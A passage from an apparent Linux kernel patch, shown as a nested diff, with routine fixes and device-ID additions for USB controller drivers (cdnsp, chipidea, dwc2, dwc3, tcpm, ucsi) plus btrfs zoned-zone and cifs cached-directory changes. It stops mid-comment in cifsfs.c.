++++ b/drivers/usb/cdns3/cdnsp-ep0.c
+@@ -403,20 +403,6 @@ static int cdnsp_ep0_std_request(struct cdnsp_device *pdev,
+ 	case USB_REQ_SET_ISOCH_DELAY:
+ 		ret = cdnsp_ep0_set_isoch_delay(pdev, ctrl);
+ 		break;
+-	case USB_REQ_SET_INTERFACE:
+-		/*
+-		 * Add request into pending list to block sending status stage
+-		 * by libcomposite.
+-		 */
+-		list_add_tail(&pdev->ep0_preq.list,
+-			      &pdev->ep0_preq.pep->pending_list);
+-
+-		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+-		if (ret == -EBUSY)
+-			ret = 0;
+-
+-		list_del(&pdev->ep0_preq.list);
+-		break;
+ 	default:
+ 		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+ 		break;
+@@ -474,9 +460,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ 	else
+ 		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+ 
+-	if (!len)
+-		pdev->ep0_stage = CDNSP_STATUS_STAGE;
+-
+ 	if (ret == USB_GADGET_DELAYED_STATUS) {
+ 		trace_cdnsp_ep0_status_stage("delayed");
+ 		return;
+@@ -484,6 +467,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ out:
+ 	if (ret < 0)
+ 		cdnsp_ep0_stall(pdev);
+-	else if (pdev->ep0_stage == CDNSP_STATUS_STAGE)
++	else if (!len && pdev->ep0_stage != CDNSP_STATUS_STAGE)
+ 		cdnsp_status_stage(pdev);
+ }
+diff --git a/drivers/usb/cdns3/cdnsp-pci.c b/drivers/usb/cdns3/cdnsp-pci.c
+index efd54ed918b97..7b151f5af3ccb 100644
+--- a/drivers/usb/cdns3/cdnsp-pci.c
++++ b/drivers/usb/cdns3/cdnsp-pci.c
+@@ -29,30 +29,23 @@
+ #define PLAT_DRIVER_NAME	"cdns-usbssp"
+ 
+ #define CDNS_VENDOR_ID		0x17cd
+-#define CDNS_DEVICE_ID		0x0100
++#define CDNS_DEVICE_ID		0x0200
++#define CDNS_DRD_ID		0x0100
+ #define CDNS_DRD_IF		(PCI_CLASS_SERIAL_USB << 8 | 0x80)
+ 
+ static struct pci_dev *cdnsp_get_second_fun(struct pci_dev *pdev)
+ {
+-	struct pci_dev *func;
+-
+ 	/*
+ 	 * Gets the second function.
+-	 * It's little tricky, but this platform has two function.
+-	 * The fist keeps resources for Host/Device while the second
+-	 * keeps resources for DRD/OTG.
++	 * Platform has two function. The fist keeps resources for
++	 * Host/Device while the secon keeps resources for DRD/OTG.
+ 	 */
+-	func = pci_get_device(pdev->vendor, pdev->device, NULL);
+-	if (!func)
+-		return NULL;
++	if (pdev->device == CDNS_DEVICE_ID)
++		return  pci_get_device(pdev->vendor, CDNS_DRD_ID, NULL);
++	else if (pdev->device == CDNS_DRD_ID)
++		return pci_get_device(pdev->vendor, CDNS_DEVICE_ID, NULL);
+ 
+-	if (func->devfn == pdev->devfn) {
+-		func = pci_get_device(pdev->vendor, pdev->device, func);
+-		if (!func)
+-			return NULL;
+-	}
+-
+-	return func;
++	return NULL;
+ }
+ 
+ static int cdnsp_pci_probe(struct pci_dev *pdev,
+@@ -230,6 +223,8 @@ static const struct pci_device_id cdnsp_pci_ids[] = {
+ 	  PCI_CLASS_SERIAL_USB_DEVICE, PCI_ANY_ID },
+ 	{ PCI_VENDOR_ID_CDNS, CDNS_DEVICE_ID, PCI_ANY_ID, PCI_ANY_ID,
+ 	  CDNS_DRD_IF, PCI_ANY_ID },
++	{ PCI_VENDOR_ID_CDNS, CDNS_DRD_ID, PCI_ANY_ID, PCI_ANY_ID,
++	  CDNS_DRD_IF, PCI_ANY_ID },
+ 	{ 0, }
+ };
+ 
+diff --git a/drivers/usb/chipidea/ci.h b/drivers/usb/chipidea/ci.h
+index 005c67cb3afb7..f210b7489fd5b 100644
+--- a/drivers/usb/chipidea/ci.h
++++ b/drivers/usb/chipidea/ci.h
+@@ -208,6 +208,7 @@ struct hw_bank {
+  * @in_lpm: if the core in low power mode
+  * @wakeup_int: if wakeup interrupt occur
+  * @rev: The revision number for controller
++ * @mutex: protect code from concorrent running when doing role switch
+  */
+ struct ci_hdrc {
+ 	struct device			*dev;
+@@ -260,6 +261,7 @@ struct ci_hdrc {
+ 	bool				in_lpm;
+ 	bool				wakeup_int;
+ 	enum ci_revision		rev;
++	struct mutex                    mutex;
+ };
+ 
+ static inline struct ci_role_driver *ci_role(struct ci_hdrc *ci)
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 27c601296130e..281fc51720cea 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -984,9 +984,16 @@ static ssize_t role_store(struct device *dev,
+ 			     strlen(ci->roles[role]->name)))
+ 			break;
+ 
+-	if (role == CI_ROLE_END || role == ci->role)
++	if (role == CI_ROLE_END)
+ 		return -EINVAL;
+ 
++	mutex_lock(&ci->mutex);
++
++	if (role == ci->role) {
++		mutex_unlock(&ci->mutex);
++		return n;
++	}
++
+ 	pm_runtime_get_sync(dev);
+ 	disable_irq(ci->irq);
+ 	ci_role_stop(ci);
+@@ -995,6 +1002,7 @@ static ssize_t role_store(struct device *dev,
+ 		ci_handle_vbus_change(ci);
+ 	enable_irq(ci->irq);
+ 	pm_runtime_put_sync(dev);
++	mutex_unlock(&ci->mutex);
+ 
+ 	return (ret == 0) ? n : ret;
+ }
+@@ -1030,6 +1038,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	spin_lock_init(&ci->lock);
++	mutex_init(&ci->mutex);
+ 	ci->dev = dev;
+ 	ci->platdata = dev_get_platdata(dev);
+ 	ci->imx28_write_fix = !!(ci->platdata->flags &
+diff --git a/drivers/usb/chipidea/otg.c b/drivers/usb/chipidea/otg.c
+index 622c3b68aa1e6..f5490f2a5b6bc 100644
+--- a/drivers/usb/chipidea/otg.c
++++ b/drivers/usb/chipidea/otg.c
+@@ -167,8 +167,10 @@ static int hw_wait_vbus_lower_bsv(struct ci_hdrc *ci)
+ 
+ void ci_handle_id_switch(struct ci_hdrc *ci)
+ {
+-	enum ci_role role = ci_otg_role(ci);
++	enum ci_role role;
+ 
++	mutex_lock(&ci->mutex);
++	role = ci_otg_role(ci);
+ 	if (role != ci->role) {
+ 		dev_dbg(ci->dev, "switching from %s to %s\n",
+ 			ci_role(ci)->name, ci->roles[role]->name);
+@@ -198,6 +200,7 @@ void ci_handle_id_switch(struct ci_hdrc *ci)
+ 		if (role == CI_ROLE_GADGET)
+ 			ci_handle_vbus_change(ci);
+ 	}
++	mutex_unlock(&ci->mutex);
+ }
+ /**
+  * ci_otg_work - perform otg (vbus/id) event handle
+diff --git a/drivers/usb/dwc2/drd.c b/drivers/usb/dwc2/drd.c
+index d8d6493bc4576..a8605b02115b1 100644
+--- a/drivers/usb/dwc2/drd.c
++++ b/drivers/usb/dwc2/drd.c
+@@ -35,7 +35,8 @@ static void dwc2_ovr_init(struct dwc2_hsotg *hsotg)
+ 
+ 	spin_unlock_irqrestore(&hsotg->lock, flags);
+ 
+-	dwc2_force_mode(hsotg, (hsotg->dr_mode == USB_DR_MODE_HOST));
++	dwc2_force_mode(hsotg, (hsotg->dr_mode == USB_DR_MODE_HOST) ||
++				(hsotg->role_sw_default_mode == USB_DR_MODE_HOST));
+ }
+ 
+ static int dwc2_ovr_avalid(struct dwc2_hsotg *hsotg, bool valid)
+diff --git a/drivers/usb/dwc2/gadget.c b/drivers/usb/dwc2/gadget.c
+index 62fa6378d2d73..8b15742d9e8aa 100644
+--- a/drivers/usb/dwc2/gadget.c
++++ b/drivers/usb/dwc2/gadget.c
+@@ -4549,8 +4549,7 @@ static int dwc2_hsotg_udc_start(struct usb_gadget *gadget,
+ 	hsotg->gadget.dev.of_node = hsotg->dev->of_node;
+ 	hsotg->gadget.speed = USB_SPEED_UNKNOWN;
+ 
+-	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL ||
+-	    (hsotg->dr_mode == USB_DR_MODE_OTG && dwc2_is_device_mode(hsotg))) {
++	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL) {
+ 		ret = dwc2_lowlevel_hw_enable(hsotg);
+ 		if (ret)
+ 			goto err;
+@@ -4612,8 +4611,7 @@ static int dwc2_hsotg_udc_stop(struct usb_gadget *gadget)
+ 	if (!IS_ERR_OR_NULL(hsotg->uphy))
+ 		otg_set_peripheral(hsotg->uphy->otg, NULL);
+ 
+-	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL ||
+-	    (hsotg->dr_mode == USB_DR_MODE_OTG && dwc2_is_device_mode(hsotg)))
++	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 
+ 	return 0;
+diff --git a/drivers/usb/dwc2/platform.c b/drivers/usb/dwc2/platform.c
+index 23ef759968231..d1589ba7d322d 100644
+--- a/drivers/usb/dwc2/platform.c
++++ b/drivers/usb/dwc2/platform.c
+@@ -91,13 +91,6 @@ static int dwc2_get_dr_mode(struct dwc2_hsotg *hsotg)
+ 	return 0;
+ }
+ 
+-static void __dwc2_disable_regulators(void *data)
+-{
+-	struct dwc2_hsotg *hsotg = data;
+-
+-	regulator_bulk_disable(ARRAY_SIZE(hsotg->supplies), hsotg->supplies);
+-}
+-
+ static int __dwc2_lowlevel_hw_enable(struct dwc2_hsotg *hsotg)
+ {
+ 	struct platform_device *pdev = to_platform_device(hsotg->dev);
+@@ -108,11 +101,6 @@ static int __dwc2_lowlevel_hw_enable(struct dwc2_hsotg *hsotg)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = devm_add_action_or_reset(&pdev->dev,
+-				       __dwc2_disable_regulators, hsotg);
+-	if (ret)
+-		return ret;
+-
+ 	if (hsotg->clk) {
+ 		ret = clk_prepare_enable(hsotg->clk);
+ 		if (ret)
+@@ -168,7 +156,7 @@ static int __dwc2_lowlevel_hw_disable(struct dwc2_hsotg *hsotg)
+ 	if (hsotg->clk)
+ 		clk_disable_unprepare(hsotg->clk);
+ 
+-	return 0;
++	return regulator_bulk_disable(ARRAY_SIZE(hsotg->supplies), hsotg->supplies);
+ }
+ 
+ /**
+@@ -576,8 +564,7 @@ static int dwc2_driver_probe(struct platform_device *dev)
+ 	dwc2_debugfs_init(hsotg);
+ 
+ 	/* Gadget code manages lowlevel hw on its own */
+-	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL ||
+-	    (hsotg->dr_mode == USB_DR_MODE_OTG && dwc2_is_device_mode(hsotg)))
++	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 
+ #if IS_ENABLED(CONFIG_USB_DWC2_PERIPHERAL) || \
+@@ -608,7 +595,7 @@ error_init:
+ 	if (hsotg->params.activate_stm_id_vb_detection)
+ 		regulator_disable(hsotg->usb33d);
+ error:
+-	if (hsotg->dr_mode != USB_DR_MODE_PERIPHERAL)
++	if (hsotg->ll_hw_enabled)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 	return retval;
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 3c63fa97a6800..cf5b4f49c3ed8 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -1699,6 +1699,7 @@ static int __dwc3_gadget_get_frame(struct dwc3 *dwc)
+  */
+ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool interrupt)
+ {
++	struct dwc3 *dwc = dep->dwc;
+ 	struct dwc3_gadget_ep_cmd_params params;
+ 	u32 cmd;
+ 	int ret;
+@@ -1722,10 +1723,13 @@ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool int
+ 	WARN_ON_ONCE(ret);
+ 	dep->resource_index = 0;
+ 
+-	if (!interrupt)
++	if (!interrupt) {
++		if (!DWC3_IP_IS(DWC3) || DWC3_VER_IS_PRIOR(DWC3, 310A))
++			mdelay(1);
+ 		dep->flags &= ~DWC3_EP_TRANSFER_STARTED;
+-	else if (!ret)
++	} else if (!ret) {
+ 		dep->flags |= DWC3_EP_END_TRANSFER_PENDING;
++	}
+ 
+ 	dep->flags &= ~DWC3_EP_DELAY_STOP;
+ 	return ret;
+@@ -3774,7 +3778,11 @@ void dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force,
+ 	 * enabled, the EndTransfer command will have completed upon
+ 	 * returning from this function.
+ 	 *
+-	 * This mode is NOT available on the DWC_usb31 IP.
++	 * This mode is NOT available on the DWC_usb31 IP.  In this
++	 * case, if the IOC bit is not set, then delay by 1ms
++	 * after issuing the EndTransfer command.  This allows for the
++	 * controller to handle the command completely before DWC3
++	 * remove requests attempts to unmap USB request buffers.
+ 	 */
+ 
+ 	__dwc3_stop_active_transfer(dep, force, interrupt);
+diff --git a/drivers/usb/gadget/function/u_audio.c b/drivers/usb/gadget/function/u_audio.c
+index c1f62e91b0126..4a42574b4a7fe 100644
+--- a/drivers/usb/gadget/function/u_audio.c
++++ b/drivers/usb/gadget/function/u_audio.c
+@@ -1422,7 +1422,7 @@ void g_audio_cleanup(struct g_audio *g_audio)
+ 	uac = g_audio->uac;
+ 	card = uac->card;
+ 	if (card)
+-		snd_card_free(card);
++		snd_card_free_when_closed(card);
+ 
+ 	kfree(uac->p_prm.reqs);
+ 	kfree(uac->c_prm.reqs);
+diff --git a/drivers/usb/misc/onboard_usb_hub.c b/drivers/usb/misc/onboard_usb_hub.c
+index 969c4c4f2ae92..87df27425ec5f 100644
+--- a/drivers/usb/misc/onboard_usb_hub.c
++++ b/drivers/usb/misc/onboard_usb_hub.c
+@@ -408,6 +408,7 @@ static void onboard_hub_usbdev_disconnect(struct usb_device *udev)
+ static const struct usb_device_id onboard_hub_id_table[] = {
+ 	{ USB_DEVICE(VENDOR_ID_GENESYS, 0x0608) }, /* Genesys Logic GL850G USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2514) }, /* USB2514B USB 2.0 */
++	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2517) }, /* USB2517 USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0411) }, /* RTS5411 USB 3.1 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x5411) }, /* RTS5411 USB 2.1 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0414) }, /* RTS5414 USB 3.2 */
+diff --git a/drivers/usb/misc/onboard_usb_hub.h b/drivers/usb/misc/onboard_usb_hub.h
+index 62129a6a1ba5a..a97b0594773fa 100644
+--- a/drivers/usb/misc/onboard_usb_hub.h
++++ b/drivers/usb/misc/onboard_usb_hub.h
+@@ -28,6 +28,7 @@ static const struct onboard_hub_pdata genesys_gl850g_data = {
+ 
+ static const struct of_device_id onboard_hub_match[] = {
+ 	{ .compatible = "usb424,2514", .data = &microchip_usb424_data, },
++	{ .compatible = "usb424,2517", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb451,8140", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usb451,8142", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usb5e3,608", .data = &genesys_gl850g_data, },
+diff --git a/drivers/usb/storage/unusual_uas.h b/drivers/usb/storage/unusual_uas.h
+index c7b763d6d1023..1f8c9b16a0fb8 100644
+--- a/drivers/usb/storage/unusual_uas.h
++++ b/drivers/usb/storage/unusual_uas.h
+@@ -111,6 +111,13 @@ UNUSUAL_DEV(0x152d, 0x0578, 0x0000, 0x9999,
+ 		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+ 		US_FL_BROKEN_FUA),
+ 
++/* Reported by: Yaroslav Furman <yaro330@gmail.com> */
++UNUSUAL_DEV(0x152d, 0x0583, 0x0000, 0x9999,
++		"JMicron",
++		"JMS583Gen 2",
++		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
++		US_FL_NO_REPORT_OPCODES),
++
+ /* Reported-by: Thinh Nguyen <thinhn@synopsys.com> */
+ UNUSUAL_DEV(0x154b, 0xf00b, 0x0000, 0x9999,
+ 		"PNY",
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 59b366b5c6144..032d21a967799 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1436,10 +1436,18 @@ static int tcpm_ams_start(struct tcpm_port *port, enum tcpm_ams ams)
+ static void tcpm_queue_vdm(struct tcpm_port *port, const u32 header,
+ 			   const u32 *data, int cnt)
+ {
++	u32 vdo_hdr = port->vdo_data[0];
++
+ 	WARN_ON(!mutex_is_locked(&port->lock));
+ 
+-	/* Make sure we are not still processing a previous VDM packet */
+-	WARN_ON(port->vdm_state > VDM_STATE_DONE);
++	/* If is sending discover_identity, handle received message first */
++	if (PD_VDO_SVDM(vdo_hdr) && PD_VDO_CMD(vdo_hdr) == CMD_DISCOVER_IDENT) {
++		port->send_discover = true;
++		mod_send_discover_delayed_work(port, SEND_DISCOVER_RETRY_MS);
++	} else {
++		/* Make sure we are not still processing a previous VDM packet */
++		WARN_ON(port->vdm_state > VDM_STATE_DONE);
++	}
+ 
+ 	port->vdo_count = cnt + 1;
+ 	port->vdo_data[0] = header;
+@@ -1942,11 +1950,13 @@ static void vdm_run_state_machine(struct tcpm_port *port)
+ 			switch (PD_VDO_CMD(vdo_hdr)) {
+ 			case CMD_DISCOVER_IDENT:
+ 				res = tcpm_ams_start(port, DISCOVER_IDENTITY);
+-				if (res == 0)
++				if (res == 0) {
+ 					port->send_discover = false;
+-				else if (res == -EAGAIN)
++				} else if (res == -EAGAIN) {
++					port->vdo_data[0] = 0;
+ 					mod_send_discover_delayed_work(port,
+ 								       SEND_DISCOVER_RETRY_MS);
++				}
+ 				break;
+ 			case CMD_DISCOVER_SVID:
+ 				res = tcpm_ams_start(port, DISCOVER_SVIDS);
+@@ -2029,6 +2039,7 @@ static void vdm_run_state_machine(struct tcpm_port *port)
+ 			unsigned long timeout;
+ 
+ 			port->vdm_retries = 0;
++			port->vdo_data[0] = 0;
+ 			port->vdm_state = VDM_STATE_BUSY;
+ 			timeout = vdm_ready_timeout(vdo_hdr);
+ 			mod_vdm_delayed_work(port, timeout);
+@@ -4547,6 +4558,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 	case SOFT_RESET:
+ 		port->message_id = 0;
+ 		port->rx_msgid = -1;
++		/* remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		tcpm_pd_send_control(port, PD_CTRL_ACCEPT);
+ 		tcpm_ams_finish(port);
+ 		if (port->pwr_role == TYPEC_SOURCE) {
+@@ -4566,6 +4580,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 	case SOFT_RESET_SEND:
+ 		port->message_id = 0;
+ 		port->rx_msgid = -1;
++		/* remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		if (tcpm_pd_send_control(port, PD_CTRL_SOFT_RESET))
+ 			tcpm_set_state_cond(port, hard_reset_state(port), 0);
+ 		else
+@@ -4695,6 +4712,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 		tcpm_set_state(port, SNK_STARTUP, 0);
+ 		break;
+ 	case PR_SWAP_SNK_SRC_SINK_OFF:
++		/* will be source, remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		/*
+ 		 * Prevent vbus discharge circuit from turning on during PR_SWAP
+ 		 * as this is not a disconnect.
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 1cf8947c6d661..8cbbb002fefe0 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1205,7 +1205,7 @@ out_unlock:
+ static int ucsi_init(struct ucsi *ucsi)
+ {
+ 	struct ucsi_connector *con;
+-	u64 command;
++	u64 command, ntfy;
+ 	int ret;
+ 	int i;
+ 
+@@ -1217,8 +1217,8 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Enable basic notifications */
+-	ucsi->ntfy = UCSI_ENABLE_NTFY_CMD_COMPLETE | UCSI_ENABLE_NTFY_ERROR;
+-	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
++	ntfy = UCSI_ENABLE_NTFY_CMD_COMPLETE | UCSI_ENABLE_NTFY_ERROR;
++	command = UCSI_SET_NOTIFICATION_ENABLE | ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+ 	if (ret < 0)
+ 		goto err_reset;
+@@ -1250,12 +1250,13 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Enable all notifications */
+-	ucsi->ntfy = UCSI_ENABLE_NTFY_ALL;
+-	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
++	ntfy = UCSI_ENABLE_NTFY_ALL;
++	command = UCSI_SET_NOTIFICATION_ENABLE | ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+ 	if (ret < 0)
+ 		goto err_unregister;
+ 
++	ucsi->ntfy = ntfy;
+ 	return 0;
+ 
+ err_unregister:
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index ce0c8ef80c043..62206a6b8ea75 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -78,7 +78,7 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 	if (ret)
+ 		goto out_clear_bit;
+ 
+-	if (!wait_for_completion_timeout(&ua->complete, HZ))
++	if (!wait_for_completion_timeout(&ua->complete, 5 * HZ))
+ 		ret = -ETIMEDOUT;
+ 
+ out_clear_bit:
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 1f503e8e42d48..f3b7d8ae93a9f 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -2100,11 +2100,21 @@ bool btrfs_can_activate_zone(struct btrfs_fs_devices *fs_devices, u64 flags)
+ 		if (!device->bdev)
+ 			continue;
+ 
+-		if (!zinfo->max_active_zones ||
+-		    atomic_read(&zinfo->active_zones_left)) {
++		if (!zinfo->max_active_zones) {
+ 			ret = true;
+ 			break;
+ 		}
++
++		switch (flags & BTRFS_BLOCK_GROUP_PROFILE_MASK) {
++		case 0: /* single */
++			ret = (atomic_read(&zinfo->active_zones_left) >= 1);
++			break;
++		case BTRFS_BLOCK_GROUP_DUP:
++			ret = (atomic_read(&zinfo->active_zones_left) >= 2);
++			break;
++		}
++		if (ret)
++			break;
+ 	}
+ 	mutex_unlock(&fs_info->chunk_mutex);
+ 
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+index 75d5e06306ea5..bfc964b36c72e 100644
+--- a/fs/cifs/cached_dir.c
++++ b/fs/cifs/cached_dir.c
+@@ -99,6 +99,23 @@ path_to_dentry(struct cifs_sb_info *cifs_sb, const char *path)
+ 	return dentry;
+ }
+ 
++static const char *path_no_prefix(struct cifs_sb_info *cifs_sb,
++				  const char *path)
++{
++	size_t len = 0;
++
++	if (!*path)
++		return path;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++	    cifs_sb->prepath) {
++		len = strlen(cifs_sb->prepath) + 1;
++		if (unlikely(len > strlen(path)))
++			return ERR_PTR(-EINVAL);
++	}
++	return path + len;
++}
++
+ /*
+  * Open the and cache a directory handle.
+  * If error then *cfid is not initialized.
+@@ -125,6 +142,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	struct dentry *dentry = NULL;
+ 	struct cached_fid *cfid;
+ 	struct cached_fids *cfids;
++	const char *npath;
+ 
+ 	if (tcon == NULL || tcon->cfids == NULL || tcon->nohandlecache ||
+ 	    is_smb1_server(tcon->ses->server))
+@@ -160,6 +178,20 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		return 0;
+ 	}
+ 
++	/*
++	 * Skip any prefix paths in @path as lookup_positive_unlocked() ends up
++	 * calling ->lookup() which already adds those through
++	 * build_path_from_dentry().  Also, do it earlier as we might reconnect
++	 * below when trying to send compounded request and then potentially
++	 * having a different prefix path (e.g. after DFS failover).
++	 */
++	npath = path_no_prefix(cifs_sb, path);
++	if (IS_ERR(npath)) {
++		rc = PTR_ERR(npath);
++		kfree(utf16_path);
++		return rc;
++	}
++
+ 	/*
+ 	 * We do not hold the lock for the open because in case
+ 	 * SMB2_open needs to reconnect.
+@@ -184,6 +216,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+@@ -251,10 +284,10 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 				(char *)&cfid->file_all_info))
+ 		cfid->file_all_info_is_valid = true;
+ 
+-	if (!path[0])
++	if (!npath[0])
+ 		dentry = dget(cifs_sb->root);
+ 	else {
+-		dentry = path_to_dentry(cifs_sb, path);
++		dentry = path_to_dentry(cifs_sb, npath);
+ 		if (IS_ERR(dentry)) {
+ 			rc = -ENOENT;
+ 			goto oshr_free;
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index d9876bd396fd4..72e24256b5ec2 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -175,7 +175,7 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 
+ 	seq_puts(m, "# Version:1\n");
+ 	seq_puts(m, "# Format:\n");
+-	seq_puts(m, "# <tree id> <persistent fid> <flags> <count> <pid> <uid>");
++	seq_puts(m, "# <tree id> <ses id> <persistent fid> <flags> <count> <pid> <uid>");
+ #ifdef CONFIG_CIFS_DEBUG2
+ 	seq_printf(m, " <filename> <mid>\n");
+ #else
+@@ -188,8 +188,9 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 				spin_lock(&tcon->open_file_lock);
+ 				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+ 					seq_printf(m,
+-						"0x%x 0x%llx 0x%x %d %d %d %pd",
++						"0x%x 0x%llx 0x%llx 0x%x %d %d %d %pd",
+ 						tcon->tid,
++						ses->Suid,
+ 						cfile->fid.persistent_fid,
+ 						cfile->f_flags,
+ 						cfile->count,
+@@ -215,6 +216,7 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ {
+ 	struct mid_q_entry *mid_entry;
+ 	struct TCP_Server_Info *server;
++	struct TCP_Server_Info *chan_server;
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+ 	struct cifs_server_iface *iface;
+@@ -471,23 +473,35 @@ skip_rdma:
+ 					seq_puts(m, "\t\t[CONNECTED]\n");
+ 			}
+ 			spin_unlock(&ses->iface_lock);
++
++			seq_puts(m, "\n\n\tMIDs: ");
++			spin_lock(&ses->chan_lock);
++			for (j = 0; j < ses->chan_count; j++) {
++				chan_server = ses->chans[j].server;
++				if (!chan_server)
++					continue;
++
++				if (list_empty(&chan_server->pending_mid_q))
++					continue;
++
++				seq_printf(m, "\n\tServer ConnectionId: 0x%llx",
++					   chan_server->conn_id);
++				spin_lock(&chan_server->mid_lock);
++				list_for_each_entry(mid_entry, &chan_server->pending_mid_q, qhead) {
++					seq_printf(m, "\n\t\tState: %d com: %d pid: %d cbdata: %p mid %llu",
++						   mid_entry->mid_state,
++						   le16_to_cpu(mid_entry->command),
++						   mid_entry->pid,
++						   mid_entry->callback_data,
++						   mid_entry->mid);
++				}
++				spin_unlock(&chan_server->mid_lock);
++			}
++			spin_unlock(&ses->chan_lock);
++			seq_puts(m, "\n--\n");
+ 		}
+ 		if (i == 0)
+ 			seq_printf(m, "\n\t\t[NONE]");
+-
+-		seq_puts(m, "\n\n\tMIDs: ");
+-		spin_lock(&server->mid_lock);
+-		list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
+-			seq_printf(m, "\n\tState: %d com: %d pid:"
+-					" %d cbdata: %p mid %llu\n",
+-					mid_entry->mid_state,
+-					le16_to_cpu(mid_entry->command),
+-					mid_entry->pid,
+-					mid_entry->callback_data,
+-					mid_entry->mid);
+-		}
+-		spin_unlock(&server->mid_lock);
+-		seq_printf(m, "\n--\n");
+ 	}
+ 	if (c == 0)
+ 		seq_printf(m, "\n\t[NONE]");
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 10e00c6249228..8485d380cddf9 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -730,13 +730,16 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	spin_lock(&tcon->tc_lock);
+ 	if ((tcon->tc_count > 1) || (tcon->status == TID_EXITING)) {
+ 		/* we have other mounts to same share or we have
+-		   already tried to force umount this and woken up
++		   already tried to umount this and woken up
+ 		   all waiting network requests, nothing to do */
+ 		spin_unlock(&tcon->tc_lock);
+ 		spin_unlock(&cifs_tcp_ses_lock);
+ 		return;
+-	} else if (tcon->tc_count == 1)
+-		tcon->status = TID_EXITING;
++	}
++	/*
